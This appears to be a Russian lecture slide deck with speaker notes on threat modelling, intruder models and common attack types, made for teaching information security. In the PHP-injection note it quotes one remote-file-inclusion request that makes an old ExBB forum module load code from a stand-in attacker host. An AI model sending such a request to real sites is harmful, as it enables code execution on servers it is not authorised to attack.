  • 18. Урок 5. Часть 2. Построение модели угроз и нарушителя. Информационная безопасность организации Лысяк Александр http://inforsec.ru Лаборатория информационной безопасности
  • 19. Идентификация угроз  Необходимо идентифицировать опасности:  Известные опасности.  Неучтённые ранее опасности.  Предварительная оценка (основывается на анализе последствий и изучении причин).  Предварительная оценка позволяет:  Принять немедленные меры.  Прекратить анализ из-за несущественности опасности.  Перейти к оценке рисков и угроз.
  • 20. Условия реализации угрозы  Угроза безопасности реализуется в результате образования канала реализации угрозы между источником угрозы и носителем (источником) защищаемых данных, что создает условия для нарушения безопасности данных (несанкционированный или случайный доступ).
  • 21. Основные элементы канала  источник– субъект, материальный объект или физическое явление, создающие угрозу;  среда распространения, в которой физическое поле, сигнал, данные или программы могут распространяться и воздействовать на защищаемые свойства;  Носитель – физическое лицо или материальный объект, в том числе физическое поле, в котором данные находят свое отражение в виде символов, образов, сигналов, технических решений и процессов, количественных характеристик физических величин. Источник угрозы Среда распространения Носитель данных
  • 22. Уровни детализации  Угрозы общего уровня. Пример: нарушение доступности сайта интернет- магазина.  Угрозы общего технического уровня. Пример: угроза реализации XSS-атаки; угроза нарушения доступности хостинга.  Угрозы детального технического уровня. Пример: наличие уязвимости CVE в SharePoint платформе; DDoS-атака на сервер хостинга / ошибки персонала хостинга.
  • 23. Компьютерная атака  Целенаправленное несанкционированное воздействие на информацию, на ресурс автоматизированной информационной системы или получение несанкционированного доступа к ним с применением программных или программно- аппаратных средств.
  • 24. Виды атак  Mailbombing  Переполнение буфера  Вирусы, троянские кони, почтовые черви, снифферы, Rootkit-ы и другие специальные программы  Сетевая разведка  Сниффинг пакетов  IP-спуфинг  Man-in-the-Middle  Инъекция  Социальная инженерия  Отказ в обслуживании
  • 27. Модель угроз Систематизированный перечень угроз безопасности при обработке информации в информационных системах. Эти угрозы обусловлены преднамеренными или непреднамеренными действиями физических лиц, действиями зарубежных спецслужб или организаций (в том числе террористических), а также криминальных группировок, создающих условия для нарушения безопасности, которое ведет к ущербу жизненно важных интересов личности, общества и государства. (ФСТЭК России)
  • 28. Зачем нужно моделирование угроз  Систематическая идентификация потенциальных опасностей.  Систематическая идентификация возможных видов отказов.  Количественные оценки или ранжирование рисков.  Выявление факторов, обуславливающих риск, и слабых звеньев в системе.  Более глубокое понимание устройства и функционирования системы.
  • 29. Зачем нужно моделирование угроз  Сопоставление риска исследуемой системы с рисками альтернативных систем или технологий.  Идентификация и сопоставление рисков и неопределенностей.  Возможность выбора мер и приемов по обеспечению снижения риска.  Основная задача моделирования окружения – обоснование решений, касающихся рисков.
  • 30. Вопросы для модели  Какие угрозы могут быть реализованы?  Как могут быть реализованы эти угрозы?  С какой вероятностью могут быть реализованы эти угрозы?  Каков потенциальный ущерб от этих угроз?  Каким образом могут быть реализованы эти угрозы?  Почему эти угрозы могут быть реализованы?  На что могут быть направлены эти угрозы?  Как можно отразить эти угрозы?
  • 31. Как все устроено Фактически мы пытаемся описать процесс противодействия нарушителю используя наше понимание процесса.
  • 32. Способы моделирования угроз  Простой перечень и описание.  Деревья угроз.
  • 33. Дерево угроз  Показывает условия реализации угроз.  Комбинированный эффект и взаимосвязь уязвимостей.  Деревьев может быть много, в зависимости от числа угроз общего уровня:  Блокирование работы сервиса.  Кража информации на р.с. пользователей.  Несанкционированное изменение данных в БД.  …  Даёт оценку вероятности реализации угроз.
  • 36. Модель нарушителя. Модель нарушителя определяет:  категории (типы) нарушителей, которые могут воздействовать на объект;  цели, которые могут преследовать нарушители каждой категории и их описание;  типовые сценарии возможных действий нарушителей, описывающие последовательность (алгоритм) действий групп и отдельных нарушителей, способы их действий на каждом этапе.
  • 37. Классификация нарушителей  Террористы и террористические организации.  Конкурирующие организации и структуры.  Спецслужбы иностранных государств и блоков государств.  Криминальные структуры.  Взломщики программных продуктов ИТ, использующихся в системах связи.  Бывшие сотрудники организаций связи.  Недобросовестные сотрудники и партнеры.  Пользователи услугами связи и др.
  • 38. Классификация нарушителей. Основные типы.  Разработчик.  Обслуживающий персонал (системный администратор, сотрудники обеспечения ИБ).  Пользователи.  Сторонние лица.
  • 39. Мотивы нарушителей  Месть.  Достижение денежной выгоды.  Хулиганство и любопытство.  Профессиональное самоутверждение.
  • 40. Спасибо за внимание! Лаборатория информационной безопасности http://inforsec.ru

Hinweis der Redaktion

  1. – технические средства и системы, их коммуникации, не предназначенные для обработки ПДн, но размещенные в помещениях (далее – служебные помещения), в которых расположены ИСПДн, их технические средства (различного рода телефонные средства и системы, средства вычислительной техники, средства и системы передачи данных в системе радиосвязи, средства и системы охранной и пожарной сигнализации, средства и системы оповещения и сигнализации, контрольно-измерительная аппаратура, средства и системы кондиционирования, средства и системы проводной радиотрансляционной сети и приема программ радиовещания и телевидения, средства электронной оргтехники, средства и системы электрочасофикации).
  2. Угрозы конфиденциальности хищение (копирование) информации, средств ее обработки, носителей; утрата (неумышленная потеря, утечка) информации , средств ее обработки и носителей; несанкционированное ознакомление, распространение. парольные проблемы, перехват информации. Угрозы доступности блокирование информации; уничтожение информации и средств ее обработки (носителей); блокирование канала передачи информации и средств обработки информации. Угрозы целостности модификация (искажение) информации; отрицание подлинности информации/отказ от совершённых действий; навязывание ложной информации, обман; уничтожение информации. Угрозы раскрытия параметров защищенной компьютерной системы появление новых угроз; выявление уязвимостей: увеличение рисков; увеличение успешности атаки.
  3. Mailbombing Считается самым старым методом атак, хотя суть его проста и примитивна: большое количество почтовых сообщений делают невозможными работу с почтовыми ящиками, а иногда и с целыми почтовыми серверами. Для этой цели было разработано множество программ, и даже неопытный пользователь мог совершить атаку, указав всего лишь e-mail жертвы, текст сообщения, и количество необходимых сообщений. Многие такие программы позволяли прятать реальный IP-адрес отправителя, используя для рассылки анонимный почтовый сервер. Эту атаку сложно предотвратить, так как даже почтовые фильтры провайдеров не могут определить реального отправителя спама. Провайдер может ограничить количество писем от одного отправителя, но адрес отправителя и тема зачастую генерируются случайным образом. Переполнение буфера Пожалуй, один из самых распространенных типов атак в Интернете. Принцип данной атаки построен на использовании программных ошибок, позволяющих вызвать нарушение границ памяти и аварийно завершить приложение или выполнить произвольный бинарный код от имени пользователя, под которым работала уязвимая программа. Если программа работает под учётной записью администратора системы, то данная атака позволит получить полный контроль над компьютером жертвы, поэтому рекомендуется работать под учётной записью рядового пользователя, имеющего ограниченные права на системе, а под учётной записью администратора системы выполнять только операции, требующие административные права. Вирусы, троянские кони, почтовые черви, снифферы, Rootkit-ы и другие специальные программы Следующий вид атаки представляет собой более изощренный метод получения доступа к закрытой информации — это использование специальных программ для ведения работы на компьютере жертвы. Такие программы предназначены для поиска и передачи своему владельцу секретной информации, либо просто для нанесения вреда системе безопасности и работоспособности компьютера жертвы. Принципы действия этих программ различны, поэтому мы не будем рассматривать их в этой статье. Сетевая разведка В ходе такой атаки кракер собственно не производит никаких деструктивных действий, но в результате он может получить закрытую информацию о построении и принципах функционирования вычислительной системы жертвы. Полученная информация может быть использована для грамотного построения предстоящей атаки, и обычно производится на подготовительных этапах. В ходе такой разведки злоумышленник может производить сканирование портов, запросы DNS, эхо-тестирование открытых портов, наличие и защищённость прокси-серверов. В результате можно получить информацию о существующих в системе DNS-адресах, кому они принадлежат, какие сервисы на них доступны, уровень доступа к этим сервисам для внешних и внутренних пользователей. Сниффинг пакетов Также довольно распространенный вид атаки, основанный на работе сетевой карты в режиме promiscuous mode, а также monitor mode для сетей Wi-Fi. В таком режиме все пакеты, полученные сетевой картой, пересылаются на обработку специальному приложению, называемым сниффером, для обработки. В результате злоумышленник может получить большое количество служебной информации: кто откуда куда передавал пакеты, через какие адреса эти пакеты проходили. Самой большой опасностью такой атаки является получение самой информации, например логинов и паролей сотрудников, которые можно использовать для незаконного проникновения в систему под видом обычного сотрудника компании. IP-спуфинг Тоже распространенный вид атаки в недостаточно защищённых сетях, когда злоумышленник выдает себя за санкционированного пользователя, находясь в самой организации, или за её пределами. Для этого кракеру необходимо воспользоваться IP-адресом, разрешённым в системе безопасности сети. Такая атака возможна, если система безопасности позволяет идентификацию пользователя только по IP-адресу и не требует дополнительных подтверждений . Man-in-the-Middle англ.. Вид атаки, когда злоумышленник перехватывает канал связи между двумя системами, и получает доступ ко всей передаваемой информации. При получении доступа на таком уровне крякер может модифицировать информацию нужным ему образом, чтобы достичь своих целей. Цель такой атаки — кража или фальсифицирование передаваемой информации, или же получение доступа к ресурсам сети. Такие атаки крайне сложно отследить, так как обычно злоумышленник находится внутри организации. Инъекция Атака, связанная с различного рода инъекциями, подразумевает внедрение сторонних команд или данных в работающую систему с целью изменения хода работы системы, а в результате — получение доступа к закрытым функциям и информации, либо дестабилизации работы системы в целом. Наиболее популярна такая атака в сети Интернет, но также может быть проведена через командную строку системы. SQL-инъекция — атака, в ходе которой изменяются параметры SQL-запросов к базе данных. В результате запрос приобретает совершенно иной смысл, и в случае недостаточной фильтрации входных данных способен не только произвести вывод конфиденциальной информации, но и изменить/удалить данные. Очень часто такой вид атаки можно наблюдать на примере сайтов, которые используют параметры командной строки (в данном случае — переменные URL) для построения SQL-запросов к базам данных без соответствующей проверки. PHP-инъекция — один из способов взлома веб-сайтов, работающих на PHP. Он заключается в том, чтобы внедрить специально сформированный злонамеренный сценарий в код веб-приложения на серверной стороне сайта, что приводит к выполнению произвольных команд. Известно, что во многих распространённых в интернете бесплатных движках и форумах, работающих на PHP (чаще всего это устаревшие версии) есть непродуманные модули или отдельные конструкции с уязвимостями. Крэкеры анализируют такие уязвимости , как неэкранированные переменные, получающие внешние значения, например старая уязвимость форума ExBB используется хакерами запросом: GET //modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt????? . Межсайтовый скриптинг или XSS (аббр. от англ.) — тип уязвимостей, обычно обнаруживаемых в веб-приложениях, которые позволяют внедрять код злонамеренным пользователям в веб-страницы, просматриваемые другими пользователями. Примерами такого кода являются HTML-код и скрипты, выполняющиеся на стороне клиента, чаще всего JavaScript. Другие названия: CSS, реже — скрипт-инъекция. XPath-инъекция - вид уязвимостей, который заключается во внедрении XPath-выражений в оригинальный запрос к базе данных XML. Как и при остальных видах инъекций, уязвимость возможна ввиду недостаточной проверки входных данных. См. также Введение в XPath-инъекции Устранение опасности XPath-внедрения Социальная инженерия Социальная инженерия (от англ. Social Engineering) — использование некомпетентности, непрофессионализма или небрежности персонала для получения доступа к информации. Этот метод обычно применяется без компьютера, с использованием обычного телефона, почтовой переписки либо кружечки пива. Таким образом обычно получается самая разнообразная информация. В ходе такой атаки злоумышленник устанавливает контакт с жертвой, и, вводя её в заблуждение либо войдя в доверие, пытается получить необходимые сведения, которые сложно получить другим путём, либо другие пути являются более рискованными. Как гласит старая поговорка, «Самое слабое звено системы безопасности — Человек». Отказ в обслуживании DoS (от англ. — Отказ в обслуживании) — атака, имеющая своей целью заставить сервер не отвечать на запросы. Такой вид атаки не подразумевает получение некоторой секретной информации, но иногда бывает подспорьем в инициализации других атак. Например, некоторые программы из-за ошибок в своем коде могут вызывать исключительные ситуации, и при отключении сервисов способны исполнять код, предоставленный злоумышленником или атаки лавинного типа, когда сервер не может обработать огромное количество входящих пакетов. DDoS (от англ. — Распределенная DoS) — подтип DoS атаки, имеющий ту же цель что и DoS, но производимой не с одного компьютера, а с нескольких компьютеров в сети. В данных типах атак используется либо возникновение ошибок, приводящих к отказу сервиса, либо срабатывание защиты, приводящей к блокированию работы сервиса, а в результате также к отказу в обслуживании. DDoS используется там, где обычный DoS неэффективен. Для этого несколько компьютеров объединяются, и каждый производит DoS атаку на систему жертвы. Вместе это называется DDoS-атака. Любая атака представляет собой не что иное, как попытку использовать несовершенство системы безопасности жертвы либо для получения информации, либо для нанесения вреда системе, поэтому причиной любой удачной атаки является профессионализм крякера и ценность информации, а так же недостаточная компетенция администратора системы безопасности в частности, несовершенство программного обеспечения, и недостаточное внимание к вопросам безопасности в компании в принципе.
  4. Иными словами – упорядоченный перечень угроз преднамеренного или нет характера